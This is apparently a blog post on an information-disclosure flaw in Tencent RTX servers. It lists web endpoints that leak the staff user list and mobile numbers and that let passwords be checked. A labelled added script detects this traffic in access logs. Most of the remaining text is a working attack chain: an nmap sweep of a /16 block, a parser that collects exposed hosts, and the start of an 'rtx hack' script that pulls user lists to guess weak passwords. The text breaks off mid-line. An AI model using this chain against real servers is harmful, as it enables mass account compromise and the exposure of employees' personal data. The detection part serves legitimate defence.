Tencent RTX (Real Time eXchange) is an enterprise-grade real-time communication platform released by Tencent.
The RTX server has an information-disclosure vulnerability: the following pages can be reached over its web interface.
http://RtxServerIp:8012/userlist.php            # leaks the list of every RTX user in the company
http://RtxServerIp:8012/getmobile.cgi?receiver=  # leaks a user's mobile phone number
http://RtxServerIp:8012/check.php               # verifies passwords, so weak passwords can be checked here
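From the server-side view, the three pages above leave a recognisable footprint in the web server's access log: a single client pulling userlist.php, then getmobile.cgi, then hammering check.php. The script below is an added example (not from the original post) that flags that pattern in combined-format access log lines; the log lines, the client addresses and the threshold of ten check.php requests are constructed for illustration, and the assumption that the RTX web component logs in Apache/nginx combined format is mine.

```python
#!/usr/bin/env python3
"""Flag RTX user-enumeration and password-guessing traffic in web access logs (added example)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Combined/common access log line; only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# The endpoints the post lists and what a hit on each of them means.
ENUM_PATHS = {
    "/userlist.php": "user list disclosure",
    "/getmobile.cgi": "mobile number disclosure",
}
LOGIN_PATH = "/check.php"


def parse_line(line):
    """Return the parsed fields of one access log line, or None if it is not a log line."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Strip the query string so getmobile.cgi?receiver=... still matches the path.
    rec["path"] = urlsplit(rec["target"]).path
    return rec


def analyse(lines, guess_threshold=10):
    """Map each suspicious client IP to a list of findings.

    A client is reported if it touched either disclosure page at all, or if it sent
    at least guess_threshold requests to check.php (password guessing).
    """
    enum_hits = defaultdict(set)
    login_attempts = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines instead of aborting the whole run
        if rec["path"] in ENUM_PATHS:
            enum_hits[rec["ip"]].add(rec["path"])
        elif rec["path"] == LOGIN_PATH:
            login_attempts[rec["ip"]] += 1

    findings = defaultdict(list)
    for ip, paths in enum_hits.items():
        for path in sorted(paths):
            findings[ip].append(ENUM_PATHS[path])
    for ip, count in login_attempts.items():
        if count >= guess_threshold:
            findings[ip].append(f"password guessing ({count} check.php requests)")
    return dict(findings)


# Constructed sample log: 10.0.0.5 enumerates users and guesses passwords,
# 10.0.0.9 is an ordinary client with one login, and one line is garbage.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Dec/2013:10:01:02 +0800] "GET /userlist.php HTTP/1.1" 200 5120 "-" "Python-urllib/2.7"',
    '10.0.0.5 - - [16/Dec/2013:10:01:03 +0800] "GET /getmobile.cgi?receiver=zhangsan HTTP/1.1" 200 64 "-" "Python-urllib/2.7"',
] + [
    f'10.0.0.5 - - [16/Dec/2013:10:01:{4 + i:02d} +0800] "POST /check.php HTTP/1.1" 200 12 "-" "Python-urllib/2.7"'
    for i in range(12)
] + [
    '10.0.0.9 - - [16/Dec/2013:10:05:00 +0800] "GET /index.php HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [16/Dec/2013:10:05:09 +0800] "POST /check.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    "not an access log line",
]

if __name__ == "__main__":
    for ip, items in analyse(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(items))
```

The threshold is the only tunable: if legitimate RTX clients or an internal portal call these pages as part of normal operation, baseline their addresses first and alert on volume rather than on any single hit.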
Scripted attack workflow:
1. sudo nmap -sS -T4 -Pn -p8012 xxx.xxx.xxx.0/16 -oX out.xml  (nmap scans a large network block; the sheer number of hosts makes up for the scan's lack of precision, and the results land in out.xml)
2. Parse out.xml and extract the IPs that have port 8012 open
3. Feed those IPs to the RTX attack script, which probes for weak passwords
Step 2: xml.py, the script that parses the nmap results
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Parse nmap's XML output (out.xml) and print every IPv4 address with port 8012 open.
import xml.etree.ElementTree as ET

tree = ET.parse("out.xml")
root = tree.getroot()
for host in root.findall("host"):
    # Look elements up by tag instead of by child position: the number and order of a
    # host's children vary (a MAC <address> element only appears for hosts on the local
    # segment), so indexing the fourth child as <ports> breaks on a remote /16 scan.
    addr = host.find("address[@addrtype='ipv4']")
    if addr is None:
        continue
    for port in host.findall("ports/port"):
        state = port.find("state")
        if port.get("portid") == "8012" and state is not None and state.get("state") == "open":
            print(addr.get("addr"))
Step 3: the RTX server attack script
#!/usr/bin/env python
#-*-coding=utf-8-*-
# date : 2013.12.16
# author : l137
# rtx hack
import threading
import urllib
import re
import sys
import getopt
import json
import httplib
import time

def usage():
    print '''
    Usage : ./f.py -u target_ip
    -h Show this page!
    '''

class postThread(threading.Thread):
    def __init__(self, data):
        threading.Thread.__init__(self)
        self.data = data

    def run(self):
        for x in self.data:
            try:
                print self.data
            except Exception, e:
                print e

class rtx(object):
    'rtx attacker class'
    ip = ''
    data = ''
    port = '8012'
    fullData = ''

    def __init__(self, ip):
        if self.checkIp(ip):
            self.ip = ip
            url = "http://"+ip+":"+self.port+"/userlist.php"
            try:
                content = urllib.urlopen(url).read()
                self.data = json.loads(content)
            except (IOError,ValueError),e:
                print "